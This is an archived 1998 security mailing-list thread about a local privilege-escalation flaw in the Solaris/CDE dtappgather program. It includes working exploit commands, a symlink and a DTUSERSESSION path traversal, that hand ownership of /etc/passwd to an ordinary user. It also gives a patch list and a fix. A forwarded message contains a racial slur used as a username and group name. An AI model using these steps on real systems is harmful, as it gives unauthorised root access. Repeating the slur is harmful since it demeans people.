I tried this on DUnix 4.0D and got it to change /etc/passwd to mode
755, owned by my uid. If dtappgather is suid root on your system, you
should remove the suid bit until Digital/Compaq comes out with a fix.
Mike Iglesias Internet: iglesias_at_draco.acs.uci.edu
University of California, Irvine phone: 949-824-6926
Office of Academic Computing FAX: 949-824-2069
------- Forwarded Message
Delivery-Date: Tue, 03 Nov 1998 15:40:01 -0800
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]
) by draco.acs.uci.edu (8.8.5/8.7.1) with ESMTP id PAA26707 for <iglesias_at_DRACO
.ACS.UCI.EDU>; Tue, 3 Nov 1998 15:40:00 -0800 (PST)
Received: from netspace.org ([128.148.157.6]:11541 "EHLO netspace.org" ident: "
TIMEDOUT2") by brimstone.netspace.org with ESMTP id <73700-27533>; Tue, 3 Nov 1
998 18:31:04 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
spool id 4582636 for BUGTRAQ_at_NETSPACE.ORG; Tue, 3 Nov 1998 18:29:01
-0500
Approved-By: aleph1_at_DFW.NET
Received: from amb1.amb.polimi.it (amb1.amb.polimi.it [131.175.33.1]) by
netspace.org (8.8.7/8.8.7) with SMTP id LAA22730 for
<BUGTRAQ_at_netspace.org>; Mon, 2 Nov 1998 11:06:07 -0500
Received: from localhost by amb1.amb.polimi.it with SMTP (1.38.193.4/16.2) id
AA26203; Mon, 2 Nov 1998 18:06:00 +0100
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.HPP.3.96.981102175301.25800A-100000_at_amb1.amb.polimi.it>
Date: Mon, 2 Nov 1998 18:05:59 +0100
Reply-To: Andrea Costantino <costan_at_AMB1.AMB.POLIMI.IT>
Sender: Bugtraq List <BUGTRAQ_at_netspace.org>
From: Andrea Costantino <costan_at_AMB1.AMB.POLIMI.IT>
Subject: another /usr/dt/bin/dtappgather feature!
X-To: news_at_rootshell.com
To: BUGTRAQ_at_netspace.org
There's attached the message related to this new feature..
the /usr/dt/bin/dtappgather program tries to read the enviroment variable
$DTUSERSESSION to get the name of the file to seek for.
The file is searched in /var/dt/appconfig/appmanager.
Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or
01777 so you're able to make a simbolic link to the file you wish, but on
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.
Unfortunately the dtappgather never check the $DTUSERSESSION variable, so
you can use the syntax ../../.. etc... to grab the file you wish, even if
you can't write the /var/dt/appconfig/appmanager directory....
For example
costan_at_penelope$ ls -ald /var/dt/appconfig/appmanager
drwxr-xr-x 9 bin bin 512 Oct 30 11:27 /var/dt/appconfig/appman
ager
costan_at_penelope$ export $DTUSERSESSION=../../../../etc/passwd
costan_at_penelope$ /usr/dt/bin/dtappgather
[.... stuff ....]
costan_at_penelope$ ls -al /etc/passwd
- - -r-xr-xr-x 1 costan users 531 Oct 9 14:08 /etc/passwd
This way you're satisfied even without making strange link on strange path
(the name in CDE are very difficult to remember ;-) )
Best Wishes, admins...
Andrea Costantino (aka k0stan)
Network Manager at DIIAR
Politecnico di Milano
Attached message:
[
http://www.rootshell.com/ ]
Date: Mon, 23 Feb 1998 15:31:16 +0200
From: Mastoras <mastoras_at_PAPARI.HACK.GR>
Subject: /usr/dt/bin/dtappgather exploit
Buggy program:
/usr/dt/bin/dtappgather
Description of the problem:
Local users can change the ownership of any file, thus gaining
root priviledges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.
Systems Affected:
*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if exists owned by another user.
Quick Fix:
chmod -s /usr/dt/bin/dtappgather
The Exploit:
The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".
Hack wisely,
Mastoras
/*
* Computer Engineering & Informatics Department, Patras, Greece
* Mastor Wins, Fatality!
http://www.hack.gr/users/mastoras
*/
- - ---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras_at_papari.hack.gr>
Reply-To: haxor_at_hack.gr
To: haxor_at_papari.hack.gr, Undisclosed recipients: ;
Subject: [HAXOR:11] dtappgather exploit
Hello,
I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:
nigg0r_at_host% ls -l /etc/passwd
- - -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r_at_host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r_at_host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r_at_host% ls -l /etc/passwd
- - -r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r_at_host% echo "nigg0r wins! Fatality!" | mail root
it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
I hope this was not too lame or well-known :-)
Seeya,
mastoras
- - --------------------------------------------------------------------------
Steven Goldberg - SE - Seattle WA (steven.goldberg_at_West.Sun.COM)
Hi,
Sun has published the following patches to address this
vulnerability:
patches 104497 CDE 1.0.1: dtappgather patch
patches 104498 CDE 1.0.2: dtappgather patch
patches 104499 CDE 1.0.1_x86: dtappgather patch
patches 104500 CDE 1.0.2_x86: dtappgather patch
patches 105837 CDE 1.2: dtappgather Patch
patches 105838 CDE 1.2_x86: dtappgather Patch
thanks,
Steve
------- End of Forwarded Message
Received on Wed Nov 04 1998 - 18:19:14 NZDT